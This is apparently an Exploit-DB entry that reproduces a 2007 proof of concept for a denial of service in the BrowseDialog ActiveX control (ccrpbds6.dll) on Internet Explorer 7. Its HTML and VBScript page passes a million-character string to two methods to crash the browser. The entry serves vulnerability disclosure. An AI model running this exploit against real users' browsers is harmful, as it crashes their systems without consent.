header-logo
Suggest Exploit
vendor:
by:
shinnai
7.5
CVSS
HIGH
Denial of Service
Stack-based Buffer Overflow
CWE
Product Name:
Affected Version From: ccrpbds6.dll
Affected Version To: ccrpbds6.dll
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7
2007

BrowseDialog Class (ccrpbds6.dll) multiple methods Denial of Service

The BrowseDialog class in ccrpbds6.dll is vulnerable to a Denial of Service attack. The vulnerability is caused by two methods in the DLL that are unable to handle long strings, leading to a stack overflow. This vulnerability can be triggered by selecting the 'IsFolderAvailable' or 'RootFolder' options in the dropdown menu and clicking the 'Click here to start the test' button.

Mitigation:

To mitigate this vulnerability, it is recommended to update the affected DLL to a patched version that handles long strings correctly.
Source

Exploit-DB raw data:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
 BrowseDialog Class (ccrpbds6.dll) multiple methods Denial of Service
 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 Soundtrack: "Zeta Reticoli" (Meganoidi)
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 I found other two methods in this dll that are unable to handle long string.
 It seems to be a Stack Overflow, but I'm not sure of this :)
------------------------------------------------------------------------------


<object classid='clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153' id='BrowseDialog'></object>
<select style="width: 404px" name="Pucca">
  <option value = "IsFolderAvailable">IsFolderAvailable</option>
  <option value = "RootFolder">RootFolder</option>
  <option value = "Quoting">Quoting...</option>
</select>



<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
   if Pucca.value="IsFolderAvailable" then
     argCount   = 1
     arg1=String(1000000, "A")
     BrowseDialog.IsFolderAvailable arg1
     BrowseDialog.IsFolderAvailable arg1
   elseif Pucca.value="RootFolder" then
     argCount   = 1
     arg1=String(1000000, "A")
     BrowseDialog.RootFolder = arg1
     BrowseDialog.RootFolder = arg1
   else
     MsgBox "Brucia ancora che prima o poi ritornerò" & vbCrLf & _
     "Conservo di nascosto sempre lo stesso smalto" & vbCrLf &_
     "Non temere zeta reticoli on my mind" & vbCrLf &_
     "Aspetterò il momento per un migliore slancio"
   end if
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-02-21]